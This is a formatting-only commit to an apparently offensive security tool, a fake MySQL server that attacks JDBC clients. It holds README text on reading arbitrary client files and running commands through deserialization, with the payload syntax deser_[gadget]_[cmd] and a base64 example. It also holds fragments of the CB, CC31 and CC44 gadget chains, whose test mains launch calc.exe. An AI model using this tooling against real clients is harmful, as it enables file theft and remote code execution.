all code fomat

4ra1n · Sep 15, 2023 · 4ac6186 · 4ac6186
1 parent 2631993
commit 4ac6186
Show file tree

Hide file tree

Showing 41 changed files with 379 additions and 371 deletions.
diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml
@@ -20,12 +20,12 @@ jobs:
  runs-on: ubuntu-latest
 
  steps:
- - uses: actions/checkout@v3
- - name: Set up JDK 8
- uses: actions/setup-java@v3
- with:
- java-version: '8'
- distribution: 'temurin'
- cache: maven
- - name: Build with Maven
- run: mvn -B package --file pom.xml
+  - uses: actions/checkout@v3
+  - name: Set up JDK 8
+  uses: actions/setup-java@v3
+  with:
+  java-version: '8'
+  distribution: 'temurin'
+  cache: maven
+  - name: Build with Maven
+  run: mvn -B package --file pom.xml
diff --git a/CHANGELOG.MD b/CHANGELOG.MD
@@ -1,6 +1,6 @@
 # CHANGELOG
 
-## 0.0.1 
+## 0.0.1
 
 init
 

diff --git a/README.md b/README.md
@@ -15,9 +15,11 @@
 
 完全使用`Java`实现部分`MySQL`协议，内置常见`ysoserial`链，一键启动，自动生成可用的`payload`用于测试
 
-参考 [MySQL_Fake_Server](https://github.com/fnmsd/MySQL_Fake_Server) 项目，`payload`从`user`参数传递。反序列化应以`deser_`开头，规则为`deser_[gadget]_[cmd]`；文件读取以`fileread_`开头，规则为`fileread_[name]`
+参考 [MySQL_Fake_Server](https://github.com/fnmsd/MySQL_Fake_Server) 项目，`payload`从`user`参数传递。反序列化应以`deser_`
+开头，规则为`deser_[gadget]_[cmd]`；文件读取以`fileread_`开头，规则为`fileread_[name]`
 
-由于某些文件名或命令存在特殊字符，支持使用`base64`传递方式，方式为原有`user`基础上进行`base64`并以`base64`开头，例如`user=deser_CB_calc.exe`等于`user=base64ZGVzZXJfQ0JfY2FsYy5leGU=`
+由于某些文件名或命令存在特殊字符，支持使用`base64`传递方式，方式为原有`user`基础上进行`base64`并以`base64`
+开头，例如`user=deser_CB_calc.exe`等于`user=base64ZGVzZXJfQ0JfY2FsYy5leGU=`
 
 默认文件保存在当前目录的`fake-server-files`下的当前时间戳目录内（自动创建目录）
 

diff --git a/doc/README.md b/doc/README.md
@@ -9,15 +9,22 @@
 
 This project is an advanced version of [MySQL_Fake_Server](https://github.com/fnmsd/MySQL_Fake_Server).
 
-When the `JDBC URL` is controllable, a special `MySQL` server can read any file or perform deserialization operations on the `JDBC` client.
+When the `JDBC URL` is controllable, a special `MySQL` server can read any file or perform deserialization operations on
+the `JDBC` client.
 
-The `MySQL` protocol is partially implemented entirely using `Java`, with built-in common `ysoserial` chains, one-click launch, and automatic generation of usable payloads for testing.
+The `MySQL` protocol is partially implemented entirely using `Java`, with built-in common `ysoserial` chains, one-click
+launch, and automatic generation of usable payloads for testing.
 
-Refer to the [MySQL_Fake_Server](https://github.com/fnmsd/MySQL_Fake_Server) project, the `payload` is transmitted from the `user` parameter. The deserialization operation should start with `deser_`, and the rule is `deser_[gadget]_[cmd]`. The file reading should start with `fileread_`, and the rule is `fileread_[name]`.
+Refer to the [MySQL_Fake_Server](https://github.com/fnmsd/MySQL_Fake_Server) project, the `payload` is transmitted from
+the `user` parameter. The deserialization operation should start with `deser_`, and the rule is `deser_[gadget]_[cmd]`.
+The file reading should start with `fileread_`, and the rule is `fileread_[name]`.
 
-Due to the existence of special characters in some file names or commands, it is possible to use the `base64` transmission method, which is based on the original `user` and followed by `base64` after `base64`, such as `user=deser_CB_calc.exe` is equal to `user=base64ZGVzZXJfQ0JfY2FsYy5leGU=`.
+Due to the existence of special characters in some file names or commands, it is possible to use the `base64`
+transmission method, which is based on the original `user` and followed by `base64` after `base64`, such
+as `user=deser_CB_calc.exe` is equal to `user=base64ZGVzZXJfQ0JfY2FsYy5leGU=`.
 
-By default, the files are saved in the directory named after the current timestamp under the `fake-server-files` directory in the current directory (the directory is automatically created).
+By default, the files are saved in the directory named after the current timestamp under the `fake-server-files`
+directory in the current directory (the directory is automatically created).
 
 Note: When reading files, if there is incomplete reading, try again to get a complete reading.
 
@@ -27,15 +34,17 @@ Since `0.0.3` version, we support use custom `gadget` function
 
 ## 0x01 GUI
 
-Use the `GUI` version to start with one click. After starting, you can enter parameters according to your environment to generate a payload.
+Use the `GUI` version to start with one click. After starting, you can enter parameters according to your environment to
+generate a payload.
 
 Launch: `java -jar fake-mysql-gui.jar`
 
 ![](../img/001.png)
 
 ## 0x02 CLI
 
-When your environment does not allow the use of the `GUI` version, you can use the command line version to start, and also use the `GUI` to generate a payload.
+When your environment does not allow the use of the `GUI` version, you can use the command line version to start, and
+also use the `GUI` to generate a payload.
 
 Launch: `java -jar fake-mysql-cli.jar -p [port]`
 

diff --git a/fake-mysql-build/pom.xml b/fake-mysql-build/pom.xml
@@ -1,6 +1,6 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+<project xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xmlns="http://maven.apache.org/POM/4.0.0"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <parent>

diff --git a/fake-mysql-cli/pom.xml b/fake-mysql-cli/pom.xml
@@ -1,6 +1,6 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+<project xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xmlns="http://maven.apache.org/POM/4.0.0"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <parent>

diff --git a/fake-mysql-cli/src/main/java/me/n1ar4/fake/cli/Cli.java b/fake-mysql-cli/src/main/java/me/n1ar4/fake/cli/Cli.java
@@ -12,7 +12,7 @@ public class Cli {
  @Parameter(names = {"-p", "--port"}, description = "port")
  private int port;
 
- @Parameter(names = {"-f","--file"},description = "gadget file")
+ @Parameter(names = {"-f", "--file"}, description = "gadget file")
  private String customGadget;
 
  public static void main(String[] args) {
@@ -33,11 +33,11 @@ private void run() {
  MySQLServer.setPort(port);
  PrintUtil.print();
 
- if(customGadget!=null&&!customGadget.isEmpty()){
+ if (customGadget != null && !customGadget.isEmpty()) {
  try {
  GadgetResolver.setCustomGadget(new String(Files.readAllBytes(Paths.get(customGadget))));
  System.out.println("set custom gadget finish");
- }catch (Exception ex){
+ } catch (Exception ex) {
  ex.printStackTrace();
  }
  }

diff --git a/fake-mysql-cli/src/main/java/me/n1ar4/fake/cli/PrintUtil.java b/fake-mysql-cli/src/main/java/me/n1ar4/fake/cli/PrintUtil.java
@@ -3,14 +3,14 @@
 import me.n1ar4.fake.proto.Version;
 
 public class PrintUtil {
- public static void print(){
- System.out.println("\u001B[33;1m　　 へ　　　　　／|\n　　/＼7　　　 ∠＿/\n　 /　"+
- "│　　 ／　／\n　│　Z ＿,＜　／　　 /`ヽ\n　│　　　　　ヽ　　 /　　"+
- "〉\n　 Y　　　　　`　 /　　/\n　?●　?　●　　??〈　　/\n　()　 へ"+
- "　　　　|　＼〈\n　　>? ?_　 ィ　 │ ／／\n　 / へ　　 /　?＜| ＼＼"+
+ public static void print() {
+ System.out.println("\u001B[33;1m　　 へ　　　　　／|\n　　/＼7　　　 ∠＿/\n　 /　" +
+ "│　　 ／　／\n　│　Z ＿,＜　／　　 /`ヽ\n　│　　　　　ヽ　　 /　　" +
+ "〉\n　 Y　　　　　`　 /　　/\n　?●　?　●　　??〈　　/\n　()　 へ" +
+ "　　　　|　＼〈\n　　>? ?_　 ィ　 │ ／／\n　 / へ　　 /　?＜| ＼＼" +
  "\n　 ヽ_?　　(_／　 │／／\n　　7　　　　　　　|／\n　　＞―r￣￣~∠--|");
  System.out.println("\u001B[32;1m Fake MySQL Server Cli \u001B[0m");
- System.out.println("\u001B[32;1m Version: "+ Version.version+" \u001B[0m");
+ System.out.println("\u001B[32;1m Version: " + Version.version + " \u001B[0m");
 
  System.out.println("\u001B[32;1m############################# USAGE #############################\u001B[0m");
  System.out.println("Deserialization user: deser_[gadget]_[params]");

diff --git a/fake-mysql-gadget/pom.xml b/fake-mysql-gadget/pom.xml
@@ -1,6 +1,6 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+<project xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xmlns="http://maven.apache.org/POM/4.0.0"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <parent>

diff --git a/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/CB.java b/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/CB.java
@@ -10,6 +10,14 @@
 
 @SuppressWarnings("all")
 public class CB {
+ public static void main(String[] args) throws Exception {
+ CB c = new CB();
+ Object obj = c.getObject("calc.exe");
+ String base64 = Base64.getEncoder().encodeToString(SerUtil.serializeObject(obj));
+ Files.write(Paths.get("test.txt"), base64.getBytes());
+ SerUtil.deserializeObject(SerUtil.serializeObject(obj));
+ }
+
  public Object getObject(final String command) throws Exception {
  final Object templates = Gadgets.createTemplatesImpl(command);
  // mock method name until armed
@@ -31,12 +39,4 @@ public Object getObject(final String command) throws Exception {
 
  return queue;
  }
-
- public static void main(String[] args) throws Exception {
- CB c = new CB();
- Object obj = c.getObject("calc.exe");
- String base64 = Base64.getEncoder().encodeToString(SerUtil.serializeObject(obj));
- Files.write(Paths.get("test.txt"),base64.getBytes());
- SerUtil.deserializeObject(SerUtil.serializeObject(obj));
- }
 }
diff --git a/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/CC31.java b/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/CC31.java
@@ -14,6 +14,12 @@
 
 @SuppressWarnings("all")
 public class CC31 {
+ public static void main(final String[] args) throws Exception {
+ CC31 c = new CC31();
+ Object o = c.getObject("calc.exe");
+ SerUtil.deserializeObject(SerUtil.serializeObject(o));
+ }
+
  public Object getObject(final String command) throws Exception {
 
  final String[] execArgs = new String[]{command};
@@ -78,10 +84,4 @@ public Object getObject(final String command) throws Exception {
  return map;
 
  }
-
- public static void main(final String[] args) throws Exception {
- CC31 c = new CC31();
- Object o = c.getObject("calc.exe");
- SerUtil.deserializeObject(SerUtil.serializeObject(o));
- }
 }
diff --git a/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/CC44.java b/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/CC44.java
@@ -7,13 +7,19 @@
 
 @SuppressWarnings("all")
 public class CC44 {
+ public static void main(final String[] args) throws Exception {
+ CC44 c = new CC44();
+ Object o = c.getObject("calc.exe");
+ SerUtil.deserializeObject(SerUtil.serializeObject(o));
+ }
+
  public Object getObject(final String command) throws Exception {
  final Object templates = Gadgets.createTemplatesImpl(command);
  // mock method name until armed
  final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
 
  // create queue with numbers and basic comparator
- final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
+ final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(transformer));
  // stub data for replacement later
  queue.add(1);
  queue.add(1);
@@ -28,10 +34,4 @@ public Object getObject(final String command) throws Exception {
 
  return queue;
  }
-
- public static void main(final String[] args) throws Exception {
- CC44 c = new CC44();
- Object o = c.getObject("calc.exe");
- SerUtil.deserializeObject(SerUtil.serializeObject(o));
- }
 }
diff --git a/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/ClassFiles.java b/fake-mysql-gadget/src/main/java/me/n1ar4/fake/gadget/ClassFiles.java
@@ -5,40 +5,40 @@
 import java.io.InputStream;
 
 public class ClassFiles {
- public static String classAsFile(final Class<?> clazz) {
- return classAsFile(clazz, true);
- }
-
- public static String classAsFile(final Class<?> clazz, boolean suffix) {
- String str;
- if (clazz.getEnclosingClass() == null) {
- str = clazz.getName().replace(".", "/");
- } else {
- str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
- }
- if (suffix) {
- str += ".class"; 
- }
- return str; 
- }
+ public static String classAsFile(final Class<?> clazz) {
+ return classAsFile(clazz, true);
+ }
+
+ public static String classAsFile(final Class<?> clazz, boolean suffix) {
+ String str;
+ if (clazz.getEnclosingClass() == null) {
+ str = clazz.getName().replace(".", "/");
+ } else {
+ str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
+ }
+ if (suffix) {
+ str += ".class";
+ }
+ return str;
+ }
+
+ public static byte[] classAsBytes(final Class<?> clazz) {
+ try {
+ final byte[] buffer = new byte[1024];
+ final String file = classAsFile(clazz);
+ final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file);
+ if (in == null) {
+ throw new IOException("couldn't find '" + file + "'");
+ }
+ final ByteArrayOutputStream out = new ByteArrayOutputStream();
+ int len;
+ while ((len = in.read(buffer)) != -1) {
+ out.write(buffer, 0, len);
+ }
+ return out.toByteArray();
+ } catch (IOException e) {
+ throw new RuntimeException(e);
+ }
+ }
 
- public static byte[] classAsBytes(final Class<?> clazz) {
- try {
- final byte[] buffer = new byte[1024];
- final String file = classAsFile(clazz);
- final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file);
- if (in == null) {
- throw new IOException("couldn't find '" + file + "'");
- }
- final ByteArrayOutputStream out = new ByteArrayOutputStream();
- int len;
- while ((len = in.read(buffer)) != -1) {
- out.write(buffer, 0, len);
- }
- return out.toByteArray();
- } catch (IOException e) {
- throw new RuntimeException(e);
- }
- }
-
 }